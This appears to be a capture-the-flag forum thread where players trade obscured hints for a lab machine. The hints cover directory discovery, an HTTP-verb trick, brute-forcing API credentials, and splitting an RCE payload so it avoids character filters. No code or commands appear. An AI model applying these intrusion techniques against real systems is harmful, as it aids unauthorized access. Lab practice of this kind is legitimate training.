Wall

Can someone explain @argot 's teacher hint a little more detailed? I dont get it

Any hint on the “verbs” hint? I’m not a native english… I’m at the point of “bad credentials” reply from API except one cred that results in a 403. Not sure i’m on the right path.

after we found the pages, is it LFI or SQL inj method, tried bruteforce with top verbs collections but after 4hrs it got failed, can any share some more hints about Argot theory pls

Type your comment> @suretshi said:

Init HINT for dumb people like me who can’t find с*******:

  1. First you need to find m*********
  2. to search for m********* you need to do the most common thing that can be done with d**b tool and at the same time not give him anything that is outside of his standard directory.

After that, pay all attention to the found m*********, but, as already said, you do not need brute force!

  1. Then the question arises: what can be done other than brute-forcing?
  2. Here you need a hint about the teacher and verbs.
  3. however, this was not enough for me: note that sometimes a slash can be crucial
  4. after that you should look at what the server told you.
    I hope I haven’t suggested too much?

@suretshi Can you DM me? Or can anyone? I figured out the “verb” I was supposed to use, but I am very much a noob at web stuff and don’t really know what to do with the information I received. Thank you in advance!

rooted

so i have made a python script to bruteforce the API, it rocks, but it is taking ages…

Type your comment> @igaralf said:

so i have made a python script to bruteforce the API, it rocks, but it is taking ages…

Are you sure it’s working as intended? It should take seconds. The pass is among the first 50. (You can PM me your script if you’d like)

is the username for the c***** a guesssing game or is it default?

nvm got it!

i writed script to bruteforce the login page and got the password but i would like to know how to bruteforce the api part i dont know what data to send ( I tried ad***=&pass***=) but it keep saying unauthorized

I understand how the exploit works. But while adding the server manually, i get 403 forbidden. Is it supposed to work like that? i believe this is why my exploit is not working either.

I enjoyed the box. Thanks @askar … To anyone that is struggling the hints that are listed should be more than enough to get you there. I made this way harder than it had to be.

Type your comment> @tang0 said:

I understand how the exploit works. But while adding the server manually, i get 403 forbidden. Is it supposed to work like that? i believe this is why my exploit is not working either.

Nope. That mechanism is kinda sketchy but our best guess is that whenever you get 403 forbidden is because of the usage of some restricted chars, like space for example. That could also be used to verify (kinda) your payload being legal

@badman89 it could easily be guessed but could even easier be rocked

is it normal to be getting 403s on the m**n.gt.pp ?

Can somebody give me a hint? Found the usual files and one protected folders, others also have mentioned already. Please PM me.

NVM found it

Got root. I can try to give you hints if you PM me.

I found .php, p**.php, /s*****-s*****, and /m*********. I don’t understand the VERB hint or how anyone discovered c*****. Can anyone PM me for what the next step should be?

This one was weird. Didn’t like that you get root and can get user and root flag but oh well!

@gNarv3 said:

This one was weird. Didn’t like that you get root and can get user and root flag but oh well!

The way for just User s***** is actually quite nice. I think the path straight to root was not intended.

[long and kinda misleading question about cve]
EDIT: got www shell\nCheck what special chars are not allowed in desired field. Remove them completely, you can divide rce into as many parts as you want.

I wonder if it is possible to crack hashes from db and restricted area? Has anyone done this?

Type your comment> @sazouki said:

i writed script to bruteforce the login page and got the password but i would like to know how to bruteforce the api part i dont know what data to send ( I tried ad***=&pass***=) but it keep saying unauthorized

check the response, should be ‘Bad credentials’